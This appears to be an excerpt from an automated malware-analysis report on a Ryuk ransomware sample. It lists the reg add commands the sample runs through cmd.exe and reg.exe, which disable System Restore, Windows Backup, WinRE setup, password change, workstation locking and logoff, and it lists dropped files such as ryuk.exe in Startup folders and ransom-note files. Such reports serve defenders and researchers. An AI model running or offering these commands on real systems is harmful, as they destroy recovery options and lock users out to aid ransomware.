C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f

Network

Files

C:\ProgramData\ryuk.exe


C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ryuk.exe


C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe


C:\ProgramData\hrmlog1


C:\Users\Admin\AppData\Local\Temp\hrmlog2


C:\Users\Admin\AppData\Local\Temp\hrmlog1

C:\ProgramData\hrmlog2

C:\Users\Admin\AppData\Local\Temp\RYUKID


C:\ProgramData\RYUKID

C:\ProgramData\RyukReadMe.txt


C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\RyukReadMe.txt


C:\ProgramData\RyukReadMe.html


C:\ProgramData\RyukReadMe.html.[[email protected]].RYK
